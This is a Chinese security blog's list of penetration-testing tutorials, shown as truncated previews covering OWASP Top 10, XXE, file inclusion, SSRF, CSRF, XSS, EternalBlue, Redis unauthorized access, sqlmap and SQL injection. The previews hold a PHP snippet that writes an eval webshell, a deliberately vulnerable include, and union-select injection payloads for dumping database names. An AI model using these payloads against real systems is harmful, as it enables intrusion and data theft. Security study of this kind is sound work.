渗透
渗透
行云tack
个人博客,与网络安全相关:https://www.xy586.top
希望大佬们赏个脸
展开
-
OWASP TOP 10
转自行云博客https://www.xy586.top/121765.html文章目录OWASP Top 10A1 注入injectionA2 失效的身份认证A3 敏感数据泄露A4 外部实体(XXE)A5 失效的访问控制A6 安全配置错误A7 跨站脚本(xss)A8 不安全的反序列化A9 使用含有已知漏洞的组件A10 不足的日志记录和监控OWASP Top 10OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威.原创 2020-10-14 19:23:24 · 2809 阅读 · 1 评论 -
渗透测试面试问题合集
一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等h、传输协议,通用漏洞,exp,github源码等2、漏洞挖掘a、浏览网站,看看原创 2020-10-11 23:52:09 · 9247 阅读 · 6 评论 -
PHP反序列化漏洞原理及示例
本站转自行云博客https://www.xy586.top/文章目录PHP反序列化序列化与反序列化PHP魔法函数反序列化漏洞简介原理触发条件示例PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00classname0x00.原创 2020-08-26 19:53:03 · 7576 阅读 · 9 评论 -
未授权访问漏洞原理及复现
本文转自行云博客https://www.xy586.top/文章目录未授权访问前提知识ssh免密登录客户端服务端安装Redis数据库Redis语法原理攻击复现利用计划任务执行命令反弹shell写ssh-keygen公钥然后使用私钥登陆往web物理路径写webshell防御方法未授权访问前提知识ssh免密登录客户端进入.ssh文件cd .ssh/生成公私钥ssh-keygen -t rsa上传公钥到服务端 ssh-copy-id user@ip更改.ssh目录跟私钥的权限chmod 7.原创 2020-08-25 19:00:55 · 5441 阅读 · 1 评论 -
XXE实体注入漏洞详解
本文转自行云博客https://www.xy586.top/文章目录什么是XXE原理XXE漏洞带来的的危害什么是 XML寻找XXEXXE的防御示例什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候.原创 2020-08-24 18:49:25 · 3709 阅读 · 0 评论 -
任意文件包含漏洞的绕过方式
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.原创 2020-08-23 16:54:17 · 3667 阅读 · 3 评论 -
任意文件包含漏洞原理解析及演示
本文转自行云博客https://www.xy586.top/文章目录原理分类PHP文件包含的函数伪协议演示php://input 伪协议data://text/plain 伪协议zip:// 伪协议原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源.原创 2020-08-20 18:42:25 · 10281 阅读 · 11 评论 -
中间件的解析漏洞详解及演示
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。原创 2020-08-19 20:18:20 · 11587 阅读 · 22 评论 -
基于JavaScript的rce反弹shell漏洞
本文转自行云博客https://www.xy586.top/文章目录环境要求工具地址攻击步骤环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下git clone https://github.com/CroweCybersecurity/ps1encode.git给权限chmod +x pslen.原创 2020-08-17 18:29:40 · 3219 阅读 · 0 评论 -
永恒之蓝漏洞原理及利用
本文转自行云博客https://www.xy586.top/文章目录摘要前提需要原理漏洞利用摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.原创 2020-08-16 22:56:14 · 27304 阅读 · 8 评论 -
RCE(远程命令/代码执行漏洞)原理及复现
本文转自行云博客https://www.xy586.top/作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格.原创 2020-08-15 16:48:51 · 9209 阅读 · 2 评论 -
SSRF服务端请求伪造——原理及绕过姿势
转自行云博客原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。发生场景只要当前服务器有发送请.原创 2020-08-12 18:19:36 · 2610 阅读 · 0 评论 -
CSRF跨站请求伪造——原理及复现
转自行云博客https://www.xy586.top/原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性你这可以这么理解CSRF攻击:攻击者盗用了.原创 2020-08-11 18:16:01 · 3124 阅读 · 1 评论 -
XSS原理详解
什么是XSS?CSS(Cross Site Scripting)—>>>XSS(跨站脚本攻击)目的:让受害者http客户端运行攻击者编写的恶意脚本。目标:前端脚本解析器,比如浏览器的javascript解析引擎、IE中的VBScript解析引擎。攻击的架构:BS架构(browser<–>(http)server)XSS有何危害?XSS能够产生的危害依赖于浏览器客户端脚本解析引擎的能力。技术上窃取凭证篡改DOM(篡改页面布局及内容)嵌入恶意的脚本代码发起原创 2020-08-03 18:03:53 · 1854 阅读 · 0 评论 -
文件上传的原理及条件
文件上传漏洞的原理通过伪装成正常文件上传,并获得合法的格式通过后实现后端server的执行前端:js后端:动态语解析[php、.net、asp、JSP]攻击者可以上传一个网站的脚本语言相对的恶意代码[apache、nginx、tomcat等等它的漏洞]文件上传需要满足的条件server端是否开后正常的上传功能已知上传文件的路径[在服务端伪装文件存放的路径1如何使得server端无法发现[伪装的过程],上传文件可以被server端接收上传文件被执行...原创 2020-07-27 19:34:55 · 1583 阅读 · 37 评论 -
sqlmap的使用方法
SQLmap的使用参数目标:至少要选中一个参数-u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)-g GOOGLEDORK 将谷歌dork的结果作为目标url请求:这些选项可用于指定如何连接到目标URL–data=DATA 数据字符串通过POST发送–cookie=COOKIE HTTP Cookie的值–random-agent 随机选择 HTTP Us原创 2020-07-27 19:34:15 · 1505 阅读 · 35 评论 -
SQL注入的基本步骤
GET类型1.判断是字符型还是数字型 2-12.通过报错判断闭合符 "’ ‘’ LIMIT 0,13.确认查询的字段数量 order by 34.确认占位信息 union select 1,2,3 --+5.爆库名 union select 1,2,database() --+6.爆表名 union select 1,2,group_concat(table_name) from information_schema.tables where table_schem原创 2020-07-27 19:33:12 · 2151 阅读 · 50 评论